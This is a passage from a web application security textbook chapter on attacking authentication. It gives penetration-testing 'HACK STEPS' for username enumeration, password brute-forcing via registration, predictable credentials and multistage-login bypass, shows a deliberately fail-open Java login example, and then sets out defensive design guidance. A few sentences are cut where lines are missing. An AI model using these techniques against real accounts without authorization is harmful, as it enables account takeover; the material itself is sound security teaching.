not explicitly linked from published content, it may still be implemented

(see Chapter 4).

■ Attempt to use the impersonation functionality directly to impersonate

other users.

■ Attempt to manipulate any user-supplied data that is processed by the

impersonation function in an attempt to impersonate other users. Pay

particular attention to any cases where your username is being submit-

ted other than during normal login.

■ If you succeed in making use of the functionality, attempt to impersonate

any known or guessed administrative users, in order to elevate privileges.

■ When carrying out password guessing attacks (see the “Brute-Forcible

valid password, or whether a specific password has been matched

against several usernames. Also, log in as many different users with the

credentials captured in a brute-force attack, and review whether every-

thing appears normal. Pay close attention to any “logged in as X” status

message.

Chapter 6 ■ Attacking Authentication 151

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 151

Incomplete Validation of Credentials

Well-designed authentication mechanisms enforce various requirements on

passwords, such as a minimum length or the presence of both uppercase and

lowercase characters. Correspondingly, some poorly designed authentication

mechanisms not only do not enforce these good practices but also do not take

account of users’ own attempts to comply with them.

For example, some applications truncate passwords and so only validate the

first n characters. Some applications perform a case-insensitive check of pass-

words. Some applications strip out unusual characters (sometimes on the pre-

text of performing input validation) before checking passwords.

Each of these limitations on password validation reduces by an order of

magnitude the number of variations available in the set of possible passwords.

Through experimentation, you can determine whether a password is being

fully validated, or whether any limitations are in effect. You can then fine-tune

your automated attacks against the login to remove unnecessary test cases,

thereby massively reducing the number of requests necessary to compromise

user accounts.

HACK STEPS

■ Using an account you control, attempt to log in with variations on your

own password: removing the last character, changing the case of a char-

acter, and removing any special typographical characters. If any of these

attempts is successful, continue experimenting to try and understand

what validation is actually occurring.

■ Feed any results back into your automated password guessing attacks, to

remove superfluous test cases and improve the chances of success.

Non-Unique Usernames

Some applications that support self-registration allow users to specify their

own username, and do not enforce a requirement that usernames be unique.

Although rare, the authors have encountered more than one application with

this behavior.

This represents a design flaw for two reasons:

■■

One user who shares a username with another user may also happen to

select the same password as that user, either during registration or in a

subsequent password change. In this eventuality, the application will

either reject the second user’s chosen password or will allow two

152 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 152

accounts to have identical credentials. In the first instance, the applica-

tion’s behavior will effectively disclose to one user the credentials of a

different user. In the second instance, subsequent logins by one of the

users will result in access to the other user’s account.

■■

An attacker may exploit this behavior to carry out a successful brute-

force attack, even though this may not be possible elsewhere due to

restrictions on failed login attempts. An attacker can register a specific

username multiple times with different passwords, while monitoring

for the differential response that indicates that an account with that

username and password already existed. The attacker will have ascer-

tained a target user’s password without making a single attempt to log

in as that user.

Badly designed self-registration functionality can also provide a means for

username enumeration. If an application disallows duplicate usernames, then

an attacker may attempt to register large numbers of common usernames to

identify the existing usernames that are rejected.

HACK STEPS

■ If self-registration is possible, attempt to register the same username

twice with different passwords.

■ If the application blocks the second registration attempt, you can exploit

this behavior to enumerate existing usernames even if this is not possi-

ble on the main login page or elsewhere. Make multiple registration

attempts with a list of common usernames to identify the already regis-

tered names that the application blocks.

■ If the registration of duplicate usernames succeeds, attempt to register

the same username twice with the same password, and determine the

application’s behavior:

■

If an error message results, you can exploit this behavior to carry out a

brute-force attack, even if this is not possible on the main login page.

Target an enumerated or guessed username, and attempt to register

this username multiple times with a list of common passwords. When

the application rejects one specific password, you have probably

found the existing password for the targeted account.

■

If no error message results, log in using the credentials you specified

and see what happens. You may need to register several users, and

modify different data held within each account, to understand

whether this behavior can be used to gain unauthorized access to

other users’ accounts.

Chapter 6 ■ Attacking Authentication 153

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 153

Predictable Usernames

Some applications automatically generate account usernames according to

some predictable sequence (for example, cust5331, cust5332, etc.). When an

application behaves like this, an attacker who can discern the sequence can

very quickly arrive at a potentially exhaustive list of all valid usernames,

which can be used as the basis for further attacks. Unlike enumeration meth-

ods that rely on making repeated requests driven by wordlists, this means of

determining usernames can be carried out very non-intrusively with minimal

interaction with the application.

HACK STEPS

■ If usernames are generated by the application, try to obtain several user-

names in quick succession and determine whether any sequence or pat-

tern can be discerned.

■ If so, extrapolate backwards to obtain a list of possible valid usernames.

This can be used as the basis for a brute-force attack against the login

and other attacks where valid usernames are required, such as the

exploitation of access control flaws (see Chapter 8).

Predictable Initial Passwords

In some applications, users are created all at once or in sizeable batches and are

automatically assigned initial passwords, which are then distributed to them

through some means. The means of generating passwords may enable an

attacker to predict the passwords of other application users. This kind of vul-

nerability is more common on intranet-based corporate applications — for

example, where every employee has an account created on their behalf, and

receives a printed notification of their password.

In the most vulnerable cases, all users receive the same password, or one

closely derived from their username or job function. In other cases, generated

passwords may contain sequences that could be identified or guessed with

access to a very small sample of initial passwords.

HACK STEPS

■ If passwords are generated by the application, try to obtain several pass-

words in quick succession and determine whether any sequence or pat-

tern can be discerned.

■ If so, extrapolate the pattern to obtain a list of passwords for other appli-

cation users.

154 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 154

HACK STEPS (continued)

■ If passwords demonstrate a pattern that can be correlated with user-

names, you can try to log in using known or guessed usernames and the

corresponding inferred passwords.

■ Otherwise, you can use the list of inferred passwords as the basis for a

brute-force attack with a list of enumerated or common usernames.

Insecure Distribution of Credentials

Many applications employ a process in which credentials for newly created

accounts are distributed to users out-of-band of their normal interaction with

the application (for example, via post or email). Sometimes, this is done for rea-

sons motivated by security concerns — for example, to provide assurance that

the postal or email address supplied by the user actually belongs to that person.

In some cases, this process can present a security risk. For example, if the

message distributed contains both username and password, there is no time

limit on their use, and there is no requirement for the user to change password

on first login, then it is highly likely that a large number, even a majority, of

application users will not modify their initial credentials and that the distribu-

tion messages will remain in existence for a lengthy period during which they

may be accessed by an unauthorized party.

Sometimes, what is distributed is not the credentials themselves, but rather

an “account activation” URL, which enables users to set their own initial pass-

word. If the series of these URLs sent to successive users manifests any kind of

sequence, then an attacker can identify this by registering multiple users in

close succession, and then infer the activation URLs sent to recent and forth-

coming users.

HACK STEPS

■ Obtain a new account. If you are not required to set all credentials during

registration, determine the means by which the application distributes

credentials to new users.

■ If an account activation URL is used, try to register several new accounts

in close succession and identify any sequence in the URLs you receive. If

a pattern can be determined, try to predict the activation URLs sent to

recent and forthcoming users, and attempt to use these URLs to take

ownership of their accounts.

■ Try to reuse a single reactivation URL multiple times, and see if the appli-

cation allows this. If not, try locking out the target account before reusing

the URL, and see if it now works.

Chapter 6 ■ Attacking Authentication 155

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 155

Implementation Flaws in Authentication

Even a well-designed authentication mechanism may be highly insecure due

to mistakes made in its implementation. These mistakes may lead to informa-

tion leakage, complete login bypassing, or a weakening of the overall security

of the mechanism as designed. Implementation flaws tend to be more subtle

and harder to detect than design defects such as poor quality passwords and

brute forcibility. For this reason, they are often a fruitful target for attacks

against the most security-critical applications, where numerous threat models

and penetration tests are likely to have claimed any low-hanging fruit. The

authors have identified each of the implementation flaws described here

within the web applications deployed by large banks.

Fail-Open Login Mechanisms

Fail-open logic is a species of logic flaw (described in detail in Chapter 11) and

one that has particularly serious consequences in the context of authentication

mechanisms.

The following is a fairly contrived example of a login mechanism that fails

open. If the call to

db.getUser() throws an exception for some reason (for

example, a null pointer exception arising because the user’s request did not

contain a username or password parameter), then the login will be successful.

Although the resulting session may not be bound to a particular user identity,

and so may not be fully functional, this may still enable an attacker to access

some sensitive data or functionality.

public Response checkLogin(Session session) {

try {

String uname = session.getParameter(“username”);

String passwd = session.getParameter(“password”);

User user = db.getUser(uname, passwd);

if (user == null) {

// invalid credentials

session.setMessage(“Login failed.”);

return doLogin(session);

}

catch (Exception e) {}

// valid user

session.setMessage(“Login successful.”);

return doMainMenu(session);

}

156 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 156

In the field, one would not expect code like this to pass even the most cur-

sory security review. However, the same conceptual flaw is much more likely

to exist in more complex mechanisms in which numerous layered method

invocations are made, in which many potential errors may arise and be han-

dled in different places, and where the more complicated validation logic may

involve maintaining significant state about the progress of the login.

HACK STEPS

■ Perform a complete, valid login using an account you control. Record

every piece of data submitted to the application, and every response

received, using your intercepting proxy.

■ Repeat the login process numerous times, modifying pieces of the data

submitted in unexpected ways. For example, for each request parameter

or cookie sent by the client:

■

Submit an empty string as the value.

■

Remove the name/value pair altogether.

■

Submit very long and very short values.

■

Submit strings instead of numbers and vice versa.

■

Submit the same item multiple times, with the same and different values.

■ For each malformed request submitted, review closely the application’s

response to identify any divergences from the base case.

■ Feed these observations back into framing your test cases. When one

modification causes a change in behavior, try to combine this with other

changes to push the application’s logic to its limits.

Defects in Multistage Login Mechanisms

Some applications use elaborate login mechanisms involving multiple stages.

For example:

■■

Entry of a username and password.

■■

A challenge for specific digits from a PIN or a memorable word.

■■

The submission of a value displayed on a changing physical token.

Multistage login mechanisms are designed to provide enhanced security

over the simple model based on username and password. Typically, the first

stage requires the user to identify themselves with a username or similar item,

and subsequent stages perform various authentication checks. Such mecha-

nisms frequently contain security vulnerabilities, and in particular various

logic flaws (see Chapter 11).

Chapter 6 ■ Attacking Authentication 157

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 157

COMMON MYTH It is often assumed that multistage login mechanisms

are less prone to security bypasses than standard username/password

authentication. This belief is misleading. Performing several authentication

checks may add considerable security to the mechanism. Counterbalancing this,

the process is more prone to flaws in implementation. In several cases where a

combination of flaws is present, it can even result in a solution that is less

secure than a normal login based on username and password.

Some implementations of multistage login mechanisms make potentially

unsafe assumptions at each stage about the user’s interaction with earlier

stages. For example:

■■

An application may assume that a user who accesses stage three must

have cleared stages one and two. Therefore, it may authenticate an

attacker who proceeds directly from stage one to stage three and cor-

rectly completes it, enabling an attacker to log in with only one part of

the various credentials normally required.

■■

An application may trust some of the data being processed at stage two

because this was validated at stage one. However, an attacker may be

able to manipulate this data at stage two, giving it a different value than

was validated at stage one. For example, at stage one the application

might determine whether the user’s account has expired, is locked out,

or is in the administrative group, or whether it needs to complete fur-

ther stages of the login beyond stage two. If an attacker can interfere

with these flags as the login transitions between different stages, they

may be able to modify the behavior of the application and cause it to

authenticate them with only partial credentials or otherwise elevate

privileges.

■■

An application may assume that the same user identity is used to com-

plete each stage; however, it might not explicitly check this. For exam-

ple, stage one might involve submitting a valid username and

password, and stage two might involve resubmitting the username

(now in a hidden form field) and a value from a changing physical

token. If an attacker submits valid data pairs at each stage, but for dif-

ferent users, then the application might authenticate the user as either

one of the identities used in the two stages. This would enable an

attacker who possesses his own physical token and discovers another

user’s password to log in as that user (or vice versa). Although the

information, its overall security posture is substantially weakened and

the substantial expense and effort of implementing the two-factor

mechanism does not deliver the benefits expected.

158 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 158

HACK STEPS

■ Perform a complete, valid login using an account you control. Record

every piece of data submitted to the application using your intercepting

proxy.

■ Identify each distinct stage of the login and the data that is collected at

each stage. Determine whether any single piece of information is col-

lected more than once or is ever transmitted back to the client and

resubmitted, via a hidden form field, cookie, or preset URL parameter

(see Chapter 5).

■ Repeat the login process numerous times with various malformed

requests:

■

Try performing the login steps in a different sequence.

■

Try proceeding directly to any given stage and continuing from there.

■

Try skipping each stage and continuing with the next.

■

Use your imagination to think of further ways of accessing the differ-

ent stages that the developers may not have anticipated.

■ If any data is submitted more than once, try submitting a different value

at different stages, and see whether the login is still successful. It may

be that some of the submissions are superfluous and are not actually

processed by the application. It might be that the data is validated at one

stage and then trusted subsequently — in this instance, try to provide the

credentials of one user at one stage, and then switch at the next to actu-

ally authenticate as a different user. It might be that the same piece of

data is validated at more than one stage, but against different checks —

in this instance, try to provide (for example) the username and password

of one user at the first stage, and the username and PIN number of a dif-

ferent user at the second stage.

■ Pay close attention to any data being transmitted via the client that was

not directly entered by the user. This may be used by the application to

store information about the state of the login progress, and may be

trusted by the application. For example, if the request for stage three

includes the parameter “stage2complete=true” then it may be possible

to advance straight to stage three by setting this value. Try to modify the

values being submitted and determine whether this enables you to

advance or skip stages.

Some login mechanisms employ a randomly varying question at one of the

stages of the login process. For example, after submitting a username and

password, the user might be asked one of various “secret” questions (regard-

ing their mother’s maiden name, place of birth, name of first school, etc.) or to

submit two random letters from a secret phrase. The rationale for this behav-

Chapter 6 ■ Attacking Authentication 159

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 159

ior is that even if an attacker captures everything that a user enters on a single

occasion, this will not enable them to log in as that user on a different occasion,

because different questions will be asked.

In some implementations, this functionality is broken and does not achieve

its objectives:

■■

The application may present a randomly chosen question, and store

the details of the question within a hidden HTML form field or cookie,

rather than on the server. The user subsequently submits both the

answer and the question itself. This effectively allows an attacker to

choose which question to answer, enabling the attacker to repeat a

■■

The application may present a randomly chosen question on each login

attempt but not remember which question a given user was asked in the

event that he or she fails to submit an answer. If the same user initiates a

fresh login attempt a moment later, a different random question will be

generated. This effectively allows an attacker to cycle through questions

until they receive one to which they know the answer, enabling them to

repeat a login having captured a user’s input on a single occasion.

NOTE The second of these conditions is really quite subtle, and as a result,

many real-world applications are vulnerable. An application that challenges a

user for two random letters of a memorable word may appear at first glance to

be functioning properly and providing enhanced security. However, if the letters

are randomly chosen each time the previous authentication stage is passed,

then an attacker who has captured a user’s login on a single occasion can

simply reauthenticate up to this point until the two letters that he knows are

requested, without the risk of account lockout.

HACK STEPS

■ If one of the login stages uses a randomly varying question, verify

whether the details of the question are being submitted together with

the answer. If so, change the question, and submit the correct answer

associated with that question, and verify whether the login is still

successful.

■ If the application does not enable an attacker to submit an arbitrary

question and answer, perform a partial login several times with a single

account, proceeding each time as far as the varying question. If the ques-

tion changes on each occasion, then an attacker can still effectively

choose which question to answer.

160 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 160

NOTE In some applications where one component of the login varies

randomly, the application collects all of a user’s credentials at a single stage.

For example, the main login page may present a form containing fields for

username, password, and one of various secret questions. Each time the login

page is loaded, the secret question changes. In this situation, the randomness

of the secret question does nothing to prevent an attacker from replaying a

valid login request having captured a user’s input on one occasion, and the

attacker can simply reload the page until he receives the varying question to

which he knows the answer. In a variation on this scenario, the application may

set a persistent cookie to “ensure” that the same varying question is presented

to any given user until that person answers it correctly. This measure can of

course be trivially circumvented by modifying or deleting the cookie.

Insecure Storage of Credentials

If an application stores login credentials in an insecure manner, then the secu-

rity of the login mechanism is undermined, even though there may be no

inherent flaw in the authentication process itself.

It is very common to encounter web applications in which user credentials

are stored in unencrypted form within the database. Because the database

account used by the application must have full read/write access to those cre-

dentials, many kinds of other vulnerabilities within the application may be

exploitable to enable you to access these credentials — for example, command

or SQL injection flaws (Chapter 9) or access control weaknesses (Chapter 8).

HACK STEPS

■ Review the entire authentication-related functionality of the application,

and also any functions relating to user maintenance. If any instances are

found in which a user’s password is transmitted back to the client, then

this may indicate that passwords are being stored in an insecure manner.

■ If any kind of arbitrary command or query execution vulnerability is

identified within the application, attempt to find the location within the

application’s database or file system where user credentials are stored.

Query these to determine whether passwords are being stored in unen-

crypted form.

Chapter 6 ■ Attacking Authentication 161

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 161

Securing Authentication

Implementing a secure authentication solution involves attempting to simul-

taneously meet several key security objectives, and in many cases trade off

against other objectives such as functionality, usability, and total cost. In some

cases “more” security can actually be counterproductive — for example, forc-

ing users to set very long passwords and change them frequently will often

lead users to write their passwords down.

Because of the enormous variety of possible authentication vulnerabilities,

and the potentially complex defenses that an application may need to deploy

in order to mitigate against all of them, many application designers and devel-

opers choose to accept certain threats as a given and concentrate their efforts

on preventing the most serious attacks. Factors to consider in striking an

appropriate balance include:

■■

The criticality of security given the functionality offered by the applica-

tion.

■■

The degree to which users will tolerate and work with different types of

authentication controls.

■■

The cost of supporting a less user-friendly system.

■■

The financial cost of competing alternatives in relation to the revenue

likely to be generated by the application or the value of the assets it is

protecting.

In this section we will describe the most effective ways possible to defeat the

various attacks against authentication mechanisms and leave readers to

decide which kinds of defenses are most appropriate for them in individual

cases.

Use Strong Credentials

■■

Suitable minimum password quality requirements should be enforced.

These may include rules regarding: minimum length; the appearance of

alphabetical, numeric, and typographical characters; the appearance of

both uppercase and lowercase characters; the avoidance of dictionary

words, names, and other common passwords; the prevention of a pass-

word being set to the username; and the prevention of a similarity or

match with previously set passwords. As with most security measures,

different password quality requirements may be appropriate for differ-

ent categories of user.

■■

Usernames should be unique.

162 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 162

■■

Any system-generated usernames and passwords should be created

with sufficient entropy that they cannot feasibly be sequenced or pre-

dicted even by an attacker who gains access to a large sample of succes-

sively generated instances.

■■

Users should be permitted to set sufficiently strong passwords — for

example, long passwords should be allowed, and a wide range of char-

acters should be allowed.

Handle Credentials Secretively

■■

All credentials should be created, stored, and transmitted in a manner

that does not lead to unauthorized disclosure.

■■

All client-server communications should be protected using a well-

established cryptographic technology, such as SSL. Custom solutions

for protecting data in transit are neither necessary nor desirable.

■■

If it is considered preferable to use HTTP for the unauthenticated areas

of the application, ensure that the login form itself is loaded using

HTTPS, rather than switching to HTTPS at the point of the login

submission.

■■

Only POST requests should be used for transmitting credentials to the

server. Credentials should never be placed in URL parameters or cook-

ies (even ephemeral ones). Credentials should never be transmitted

back to the client, even in parameters to a redirect.

■■

All server-side application components should store credentials in a

manner that does not allow their original values to be easily recovered

even by an attacker who gains full access to all the relevant data within

the application’s database. The usual means of achieving this objective

is to use a strong hash function (such as SHA-256, at the time of this

writing), appropriately salted to reduce the effectiveness of precom-

puted offline attacks.

■■

Client-side “remember me” functionality should in general only

remember nonsecret items such as usernames. In less security-critical

applications, it may be considered appropriate to allow users to opt

in to a facility to remember passwords. In this situation, no clear-text

credentials should be stored on the client (the password should be

stored reversibly encrypted using a key known only to the server), and

users should be warned about the risks from an attacker with physical

access to their computer or who compromises their computer remotely.

Particular attention should be paid to eliminating cross-site scripting

Chapter 6 ■ Attacking Authentication 163

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 163

vulnerabilities within the application that may be used to steal stored

credentials (see Chapter 12).

■■

A password change facility should be implemented (see the “Prevent

Misuse of the Password Change Function” section), and users should

be obliged to change their password periodically.

■■

Where credentials for new accounts are distributed to users out-of-

band, these should be sent as securely as possible, be time-limited, and

require the user to change them on first login, and the user should be

told to destroy the communication after first use.

■■

Where applicable, consider capturing some of the user’s login informa-

tion (for example, single letters from a memorable word) using drop-

down menus rather than text fields. This will prevent any keyloggers

installed on the user’s computer from capturing all of the data they

submit. (Note, however, that a simple keylogger is only one means by

which an attacker can capture user input. If he or she has already com-

promised a user’s computer, then in principle an attacker can log every

type of event, including mouse movements, form submissions over

HTTPS, and screen captures.)

Validate Credentials Properly

■■

Passwords should be validated in full — that is, in a case-sensitive way,

without filtering or modifying any characters, and without truncating

the password.

■■

The application should be aggressive in defending itself against unex-

pected events occurring during login processing. For example, depend-

ing on the development language in use, the application should use

catch-all exception handlers around all API calls. These should explic-

itly delete all session and method-local data being used to control the

state of the login processing and should explicitly invalidate the current

session, thereby causing a forced logout by the server even if authenti-

cation is somehow bypassed.

■■

All authentication logic should be closely code-reviewed, both as

pseudo-code and as actual application source code, to identify logic

errors such as fail-open conditions.

■■

If functionality to support user impersonation is implemented, this

should be strictly controlled to ensure that it cannot be misused to

gain unauthorized access. Because of the criticality of the functionality,

it is often worthwhile to remove this functionality entirely from the

164 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 164

public-facing application, and implement it only for internal adminis-

trative users, whose use of impersonation should be tightly controlled

and audited.

■■

Multistage logins should be strictly controlled to prevent an attacker

from interfering with the transitions and relationships between the

stages:

■■

All data about progress through the stages and the results of previ-

ous validation tasks should be held in the server-side session object

and should never be transmitted to or read from the client.

■■

No items of information should be submitted more than once by the

user, and there should be no means for the user to modify data that

has already been collected and/or validated. Where an item of data

such as a username is used at multiple stages, this should be stored

in a session variable when first collected, and referenced from there

subsequently.

■■

The first task carried out at every stage should be to verify that all

prior stages have been correctly completed. If this is not the case, the

authentication attempt should immediately be marked as bad.

■■

To prevent information leakage about which stage of the login failed

(which would enable an attacker to target each stage in turn), the

application should always proceed through all stages of the login,

even if the user has failed to complete earlier stages correctly, and

even if the original username was invalid. After proceeding through

all of the stages, the application should present a generic “login

failed” message at the conclusion of the final stage, without provid-

ing any information about where the failure occurred.

■■

Where a login process includes a randomly varying question, ensure

that an attacker is not able to effectively choose his own question:

■■

Always employ a multistage process in which users identify them-

selves at an initial stage, and the randomly varying question is pre-

sented to them at a later stage.

■■

When a given user has been presented with a given varying ques-

tion, store that question within their persistent user profile, and

ensure that the same user is presented with the same question on

each attempted login until they successfully answer it.

■■

When a randomly varying challenge is presented to the user, store

the question that has been asked within a server-side session vari-

able, rather than a hidden field in an HTML form, and validate the

subsequent answer against that saved question.

Chapter 6 ■ Attacking Authentication 165

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 165

NOTE The subtleties of devising a secure authentication mechanism run

deep here. If care is not taken in the asking of a randomly varying question,

then this can lead to new opportunities for username enumeration. For

example, in order to prevent an attacker from choosing his own question, an

application may store within each user’s profile the last question that user was

asked, and continue presenting that question until the user answers it correctly.

An attacker who initiates several logins using any given user’s username will

be met with the same question. However, if the attacker carries out the same

process using an invalid username, the application may behave differently:

because there is no user profile associated with an invalid username, there

will be no stored question, and so a varying question will be presented. The

attacker can use this difference in behavior, manifested across several login

attempts, to infer the validity of a given username. In a scripted attack, he will

be able to harvest numerous usernames quickly.

If an application wishes to defend itself against this possibility, it must go to

some lengths. When a login attempt is initiated with an invalid username, the

application must record somewhere the random question that it presented for

that invalid username and ensure that subsequent login attempts using the

same username are met with the same question. Going even further, the

application could switch to a different question periodically, to simulate the

nonexistent user having logged in as normal, resulting in a change in their next

question! At some point, however, the application designer must draw a line

and concede that a total victory against an attacker as determined as this is

probably not achievable.

Prevent Information Leakage

■■

The various authentication mechanisms used by the application should

not disclose any information about authentication parameters, either

through overt messages or through inference from other aspects of the

application’s behavior. An attacker should have no means of determin-

ing which piece of the various items submitted has caused a problem.

■■

A single code component should be responsible for responding to all

failed login attempts, with a generic message. This avoids a subtle vul-

nerability that can occur when a supposedly uninformative message

returned from different code paths can actually be discriminated by an

attacker, due to typographical differences in the message, different

HTTP status codes, other information hidden in HTML, and the like.

■■

If the application enforces some kind of account lockout to prevent

brute-force attacks (as discussed in the next section), then care should

166 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 166

be taken that this does not lead to any information leakage. For exam-

ple, if an application discloses that a specific account has been sus-

pended for X minutes due to Y failed logins, then this behavior can

easily be used to enumerate valid usernames. In addition, disclosing

the precise metrics of the lockout policy enables an attacker to optimize

any attempt to continue guessing passwords in spite of the policy. To

avoid enumeration of usernames, the application should respond to any

series of failed login attempts from the same browser with a generic

message advising that accounts are suspended if multiple failures occur

and that the user should try again later. This can be achieved using a

cookie or hidden field to track repeated failures originating from the

same browser. (Of course, this mechanism should not be used to

enforce any actual security control — only to provide a helpful message

to ordinary users who are struggling to remember their credentials.)

■■

If the application supports self-registration, then it can prevent this func-

tion from being used to enumerate existing usernames in two ways:

■■

Instead of permitting self-selection of usernames, the application can

create a unique (and unpredictable) username for each new user,

thereby obviating the need to disclose that a username selected

already exists.

■■

The application can use email addresses as usernames. Here, the

first stage of the registration process requires the user to enter their

email address, whereupon they are told simply to wait for an email

and follow the instructions contained within it. If the email address

is already registered, the user can be informed of this in the email. If

the address is not already registered, the user can be provided with

a unique, unguessable URL to visit to continue the registration

process. This prevents the attacker from enumerating valid user-

names (unless they happen to have already compromised a large

number of email accounts).

Prevent Brute-Force Attacks

■■

Measures need to be enforced within all of the various challenges

implemented by the authentication functionality in order to prevent

attacks that attempt to meet those challenges using automation. This

includes the login itself, as well as functions to change password, to

recover from a forgotten password situation, and the like.

■■

Using unpredictable usernames and preventing their enumeration pre-

sents a significant obstacle to completely blind brute-force attacks, and

Chapter 6 ■ Attacking Authentication 167

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 167

requires an attacker to have somehow discovered one or more specific

usernames before mounting an attack.

■■

Some security-critical applications (such as online banks) simply

disable an account after a small number of failed logins (e.g., three)

and require that the account owner take various out-of-band steps to

reactivate the account, such as telephoning customer support and

answering a series of security questions. Disadvantages of this policy

are that it allows an attacker to deny service to legitimate users by

repeatedly disabling their accounts, and the cost of providing the

account recovery service. A more balanced policy, suitable for most

security-aware applications, is to suspend accounts for a short period

(e.g., 30 minutes) following a small number of failed login attempts

(e.g., three). This serves to massively slow down any password-

guessing attack, while mitigating the risk of denial-of-service attacks

and also reducing call center work.

■■

If a policy of temporary account suspension is implemented, care

should be taken to ensure its effectiveness:

■■

To prevent information leakage leading to username enumeration,

the application should never indicate that any specific account has

been suspended. Rather, it should respond to any series of failed

logins, even those using an invalid username, with a message advis-

ing that accounts are suspended if multiple failures occur and that

the user should try again later (as discussed previously).

■■

The metrics of the policy should not be disclosed to users. Telling

legitimate users simply to “try again later” does not seriously dimin-

ish their quality of service. But informing an attacker exactly how

many failed attempts are tolerated, and how long the suspension

period is for, enables them to optimize any attempt to continue

guessing passwords in spite of the policy.

■■

If an account is suspended, then login attempts should be rejected

without even checking the credentials. Some applications that have

implemented a suspension policy remain vulnerable to brute forcing

because they continue to fully process login attempts during the sus-

pension period, and return a subtly (or not so subtly) different mes-

sage when valid credentials are submitted. This behavior enables an

effective brute-force attack to proceed at full speed regardless of the

suspension policy.

■■

Per-account countermeasures such as account lockout do not help to

protect against one kind of brute-force attack that is often highly effec-

tive — namely to iterate through a long list of enumerated usernames

checking a single weak password, such as

password. If, for example, five

168 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 168

failed attempts trigger an account suspension, this means an attacker

can attempt four different passwords on every account without causing

any disruption to users. In a typical application containing many weak

passwords, such an attacker is likely to compromise many accounts.

The effectiveness of this kind of attack will, of course, be massively

reduced if other areas of the authentication mechanism are designed

securely. If usernames cannot be enumerated or reliably predicted, an

attacker will be slowed down by the need to perform a brute-force exer-

cise in guessing usernames. And if strong requirements are in place for

password quality, it is far less likely that the attacker will choose a pass-

word for testing that even a single user of the application has chosen.

In addition to these controls, an application can specifically protect

itself against this kind of attack through the use of CAPTCHA (“Com-

pletely Automated Public Turing test to tell Computers and Humans

Apart”) challenges on every page that may be a target for brute-force

attacks (see Figure 6-8). If effective, this measure can prevent any auto-

mated submission of data to any application page, thereby restricting

all kinds of password-guessing attacks from being executed manually.

Note that much research has been done into CAPTCHA technologies,

and automated attacks against them have in some cases been reliable.

Further, some attackers have been known to devise CAPTCHA-solving

competitions, in which unwitting members of the public are leveraged

as drones to assist the attacker. However, even if a particular kind of

challenge is not entirely effective, it will still lead most casual attackers

to desist and find an application that does not employ the technique.

Figure 6-8: A CAPTCHA control

designed to hinder automated attacks

TIP If you are attacking an application that uses CAPTCHA controls to hinder

automation, always closely review the HTML source for the page in which the

image appears. The authors have encountered cases where the solution to the

puzzle appears in literal form within the ALT attribute of the image tag, or

within a hidden form field, enabling a scripted attack to defeat the protection

without actually solving the puzzle itself.

Chapter 6 ■ Attacking Authentication 169

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 169

Prevent Misuse of the Password Change Function

■■

A password change function should always be implemented, to allow

periodic password expiration (if required) and to allow users to change

passwords if they wish to for any reason. As a key security mechanism,

this needs to be very well defended against misuse.

■■

The function should only be accessible from within an authenticated

session.

■■

There should be no facility to provide a username, either explicitly or

via a hidden form field or cookie — users have no legitimate need to

attempt to change other people’s passwords.

■■

As a defense-in-depth measure, the function should be protected from

unauthorized access gained via some other security defect in the appli-

cation — such as a session hijacking vulnerability, cross-site scripting,

or even an unattended terminal. To this end, users should be required

to reenter their existing password.

■■

The new password should be entered twice to prevent mistakes, and

the application should compare the “new password” and “confirm new

password” fields as its first step and return an informative error if they

do not match.

■■

The function should prevent the various attacks that can be made

against the main login mechanism: a single generic error message

should be used to notify users of any error in existing credentials, and

the function should be temporarily suspended following a small num-

ber of failed attempts to change password.

■■

Users should be notified out-of-band (e.g., via email) that their pass-

word has been changed, but the message should not contain either their

old or new credentials.

Prevent Misuse of the Account Recovery Function

■■

In the most security-critical applications, such as online banking,

account recovery in the event of a forgotten password is handled out-

of-band: a user must make a telephone call and answer a series of secu-

rity questions, and new credentials or a reactivation code are also sent

out-of-band (via conventional mail) to the user’s registered home

address. The majority of applications do not want or need this level of

security, and so an automated recovery function may be appropriate.

■■

A well-designed password recovery mechanism needs to prevent

accounts from being compromised by an unauthorized party, and mini-

mize any disruption to legitimate users.

170 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 170

■■

Features such as password “hints” should absolutely never be used,

since they mainly serve to assist an attacker in trawling for accounts

with obvious hints set.

■■

The best automated solution for enabling users to regain control of

accounts is to email the user a unique, time-limited, unguessable,

single-use recovery URL. This email should be sent to the address that

the user provided during registration. Visiting the URL will allow the

user to set a new password. After this has been done, a second email

should be sent, indicating that a password change was made. To pre-

vent an attacker denying service to users by continually requesting

password reactivation emails, the user’s existing credentials should

remain valid until such time as they are changed.

■■

To further protect against unauthorized access, applications may pre-

sent users with a secondary challenge that they must complete before

gaining access to the password reset function. Care must taken to

ensure that the design of this challenge does not introduce new

vulnerabilities:

■■

The challenge should implement the same question or set of ques-

tions for everyone, mandated by the application during registration.

If users provide their own challenge, it is likely that some of these

will be very weak, and this also enables an attacker to enumerate

valid accounts by identifying those which have a challenge set.

■■

Responses to the challenge should contain sufficient entropy that

they cannot be easily guessed. For example, asking the user for the

name of their first school is preferable to asking for their favorite

color.

■■

Accounts should be temporarily suspended following a number of

failed attempts to complete the challenge, to prevent brute-force

attacks.

■■

The application should not leak any information in the event of

failed responses to the challenge — regarding the validity of the

username, any suspension of the account, and so on.

■■

